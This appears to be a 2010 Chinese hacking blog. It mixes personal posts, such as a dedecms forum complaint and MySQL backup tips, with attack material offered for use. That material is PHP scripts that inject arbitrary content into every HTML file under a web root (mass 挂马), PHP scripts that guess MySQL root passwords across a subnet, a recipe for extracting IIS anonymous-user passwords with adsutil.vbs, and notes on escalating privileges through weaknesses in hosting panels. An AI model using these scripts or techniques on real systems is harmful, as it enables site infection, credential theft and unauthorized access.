Robert's blog

dedecms有感

root@cnmoker.org(admin) — Mon,08 Mar 2010 17:00:06 +0800

今天发现自己的网站被人挂了个链接
立刻检查网站..发现已经被日了...
更加悲剧的是.IDC服务器所有网站都没有开通IIS日志功能,,,
这家IDC我很无语的说...
没办法...只有到网上转转...
于是看到了dedecms被曝漏洞....
下了个新版测试了下,还是有漏洞存在...
我很崩溃..
到dedecms论坛上去发帖...

居然"漏洞"二字成了屏蔽字
难道dede的ceo是gcd的??
把这习惯继承的天衣无缝......

我不反对,对自身产品的保护,但是居然把这两个字在自己论坛设置成屏蔽字,我很难理解...............

最后无奈改成pinyin缩写...
dede的人好像还不知道....
我觉得即使柏拉图离开了dede,也不能麻痹到这个地步吧...

我也有同门师兄在dede ,对dede并无恶意相加的意识,但是实在是对dede很无语,..

再次辞职

root@cnmoker.org(admin) — Thu,25 Feb 2010 11:45:41 +0800

再次选择辞职了...
事隔才半年...
未来的路还是很遥远啊.........
都不知道自己会什么

获取iis用户密码

root@cnmoker.org(admin) — Wed,17 Feb 2010 20:13:07 +0800

使用adsutil.vbs
并且注意要改下设置
IsSecureProperty = False
原值是true
改成false才能显示密码
语法命令cscript.exe c:\adsutil.vbs get w3svc/siteid/root/anonymoususerpass

例如cscript.exe c:\adsutil.vbs get w3svc/218922181/root/anonymoususerpass

这个id号存在于C:\WINDOWS\system32\inetsrv\MetaBase.xml
中的IIsWebServer Location="/LM/W3SVC/218922181"

悲剧的是想在注册表里获取,没搜索到,,
哪位大牛还知道可以从其他渠道获取这个值吗??

一下拉了200多个qq好友

root@cnmoker.org(admin) — Tue,16 Feb 2010 18:06:50 +0800

也不知道是那里来的疯狗,,大年三十就咬了一下,,,上来就百度我的名字...悲剧,身份证号码被这厮弄去了...
早先的时候在my.qq.com填写过资料..
相信很多老用户都填写过..

说实话,这次还算好,对方是个菜鸟,拿我的名字去百度,只得到少量有用的信息,而且都是可以说假的,因为我填写的时候就是假的,不过这些信息确实是我填写的...更搞笑的是,他加我qq跟我说他百度到的信息,直接的方式,原意是想要挟我+显示他的实力,显然一听到这个消息,我的心就平静了,因为那些是假的,而且我还知道了他是何种渠道弄到的这些东西.所以说,操之过急,就会暴露自己.在没有从第三方渠道确认消息的可靠性的时候,千万不要对当事人提及你的消息.
信息安全啊!很惭愧啊.
之前还考虑要不要把这个细节写在博客上,最后还是决定写,不怕被心理阴暗者看到,因为即使他们看到了,做事的时候也会忽略,只有心理阳光的人,在能在实战中劳记经验,一般的匪徒,因为各种杂念,是不容易记住这些细节的.

发现腾讯两个不安全设计 ,其中一个比较危险
第一个是my.qq.com里身份信息里证件号码点更新就全部显示出来了,之前显示星号就毫无意义了
第二个是那个快速登录功能.比如,我的qq被改密码后下线了,但是我没关qq的话,在qq.com里我还是能任意通行的
即使密码被更改.而且在qq安全中心多了个密保重置的功能,我还能在里面更改密保资料...
这个问题比较严重...

腾讯的安全审核机制太挫了..

PHP批量挂马

root@cnmoker.org(admin) — Mon,08 Feb 2010 21:59:02 +0800

转混世魔王 blog

写入文件头

 程序代码
ini_set("max_execution_time",0);
$dir = "Z:/soft/111/bf"; 

function view_dir($directory)
{
    $handle = opendir( $directory );
    while ( $file = readdir($handle) )
    {
        $bdir = $directory . '/' .$file;
        if ($file <> '.' && $file <> '..' && is_dir($bdir))
        {
            view_dir( $directory .'/'. $file);
        }
        else if( $file <> '.' && $file <> '..')
        {
            if(strstr(strtolower($directory.'/'.$file),".htm")||strstr(strtolower($directory.'/'.$file),".html")){
   $content=file_get_contents($directory .'/'. $file);
   $content='xxxxxx'.$content;
             fwrite(fopen($directory .'/'. $file,"w"),$content);
            }
        }
    }
    closedir( $handle );
}
view_dir($dir);
?>

写入文件尾部

 程序代码
ini_set("max_execution_time",0);
$dir = "C:\\APMServ5.2.6\\www\\htdocs\\replacer"; 

function view_dir($directory)
{
    $handle = opendir( $directory );
    while ( $file = readdir($handle) )
    {
        $bdir = $directory . '/' .$file;
        if ($file <> '.' && $file <> '..' && is_dir($bdir))
        {
            view_dir( $directory .'/'. $file);
        }
        else if( $file <> '.' && $file <> '..')
        {
            if(strstr(strtolower($directory.'/'.$file),".htm")||strstr(strtolower

($directory.'/'.$file),".html")){
            $content=fwrite(fopen($directory .'/'. $file,"a+"),'xxxxxx');
            }
        }
    }
    closedir( $handle );
}
view_dir($dir);
?>

替换插入

 程序代码
ini_set("max_execution_time",0);
$dir = "C:\\APMServ5.2.6\\www\\htdocs\\replacer"; 

function view_dir($directory)
{
    $handle = opendir( $directory );
    while ( $file = readdir($handle) )
    {
        $bdir = $directory . '/' .$file;
        if ($file <> '.' && $file <> '..' && is_dir($bdir))
        {
            view_dir( $directory .'/'. $file);
        }
        else if( $file <> '.' && $file <> '..')
        {
            if(strstr(strtolower($directory.'/'.$file),".htm")||strstr(strtolower($directory.'/'.$file),".html")){
   $content=file_get_contents($directory .'/'. $file);
   $content=str_replace('','xxxxxxxxxxxx',$content);
             fwrite(fopen($directory .'/'. $file,"w"),$content);
            }
        }
    }
    closedir( $handle );
}
view_dir($dir);
?>

国内虚拟主机软件弱点备忘录(持续更新)

root@cnmoker.org(admin) — Mon,01 Feb 2010 10:39:23 +0800

因时间原因,会持续更新,同时您有相关的信息,方便共享的话,请mail:root@cnmoker.org,thks

蓝芒 BlueManage

首先蓝芒的代码经过zend.我们可以使用黑刀进行解密.
蓝芒的密码是存储在blh5_userinfo表里并且密码是经过key加的密码
加密的key保存在x:\BlueManage\conf_default\config.php 文件里,并且这个文件不经过zend,因为方便客户更改
同时root密码也保存在此文件

后台需要前台管理员才能看到登陆界面.不然一律提示拒绝

关键代码可查看解密后的根目录下的admincp.php

代码如下

 程序代码
include_once( "system/common/common.php" );
if ( !defined( "IN_BLH5_SYSTEM" ) )
{
                exit( "Access Denied. Copyrights (C) BlueLight Hosting 5.0.0" );
}

目录关键字
x:\Vhost\WebRoot
这个不一定准.可做参考

星外 7i24.com
星外虚拟主机系统从目前公布的漏洞情况看,是比较安全的.他的目录结构比较清晰,分工明确.国内紫田网络基本上都是采用星外的系统的.
我测试目前主要有以下两个漏洞
第一,如果是7i24+serv-u的主机,一般注册表里可以读出很多东西.在注册表HKLM项的software项里,保存有serv-u的路径,密码等信息.而且如果是安装了imail的话,有一个本地提权漏洞关于imail的位于如下注册表.

 程序代码
HKEY_LOCAL_MACHINE\SOFTWARE\Ipswitch\IMail

 程序代码
C:\Program Files\Ipswitch\IMail\

总之注册表利用在提权中也是非常重要的,这点大家一定要记得.
并不是星外才有这个弱点
第二,星外的后台存储的比如mssql密码,mysql密码等,都可以用一般的密码读取工具读出来,这一点也算是一个弱点吧,不过有个前提条件就是必须有后台权限.
我有一次得到一个mssql的一般权限用户,这个用户有读星外库的权限,读到后台管理密码后,登陆,查到sa密码提权成功,所以也是要注意的.
还有一个要注意的,也在这里说了.星外也有这个毛病就是.
mysql的data目录,一般来说,user或者干脆iis用户是有读或者完全控制权限的.
这点也很危险,基本上控制了data,这个虚拟主机下的所有基于mysql的网站就game over了
随之带来的风险,可想而知.

hzhost 华众
这个不用说,注入漏洞就出了几个.我稍后再这个文章总结下.

Oracle Hash Crack Online

root@cnmoker.org(admin) — Fri,29 Jan 2010 22:44:05 +0800

http://ops.conus.info/

简单的MYSQL服务器猜密码脚本

root@cnmoker.org(admin) — Tue,26 Jan 2010 14:33:30 +0800

转自4ngel

昨日渗透时，整段都是MYSQL服务器。在某个WEB下。用如下脚本来猜了一下MYSQL密码。还真有两个。在WEB下用脚本来弄也方便快捷。MSSQL的同理。。

这个是已知开了3306的。。

 程序代码

$hostdb = array(
    '192.168.168.10',
    '192.168.168.20',
    '192.168.168.20',
    '192.168.168.40',
    '192.168.168.50',
    '192.168.168.60',
    '192.168.168.70',
    '192.168.168.80',
    '192.168.168.90',
    '192.168.168.100'
);

$dbu = 'root';
$dbp = '1qaz2wsx';

foreach ($hostdb as $host) {
    if(@mysql_connect($host, $dbu, $dbp)) {
        echo $host.' - '.$dbu.' - '.$dbp.' ... OK
';
    }
}

echo 'done.';

?>

举一反三，这是全段猜的。

 程序代码

$ips = '192.168.168.';
$dbu = 'root';
$dbp = '1qaz2wsx';

for ($i=1; $i<254; $i++) {
    if(@mysql_connect($ips.$i, $dbu, $dbp)) {
        echo $ips.$i.' - '.$dbu.' - '.$dbp.' ... OK
';
    }
}

echo 'done.';

?>

ps:现在很多虚拟机都是以sq_baidu用户名,baiducom为密码或者密码都是有规律的..

这个脚本发挥下的话.效果很好.算是自动化渗透工具的一个很好的思路!!

关于mysql数据库的双机热备问题

root@cnmoker.org(admin) — Wed,30 Dec 2009 14:57:04 +0800

因为上一次的数据库丢失事件,导致我的网站,数据倒退一个月,甚至一个网站排名直接下降了几十页.至今首页无法正常快照.
其实之前对mysql的数据库备份也做过一些.
看过很多文档,但是我要说一点,什么叫热备??
网上很多文章,所谓热备,都是copy data目录下的数据库文件到另外的备份文件夹,然后上传到另一个主机..,事实上,在应用上,要延时很长时间,而且不能做到实时数据备份.
如果一旦大的数据库出现故障.数据肯定会倒退至少1-2个小时.
而且如果是主机的灾难,那么可能在你还没上传的时候,主机就宕机了呢??
mssql有差异备份,mysql也可以通过工具来实时对比数据库进行实时备份.
利用navicat for mysql这个软件,进行头一次的结构同步,然后进行二次的数据同步就可以.
省了不少的麻烦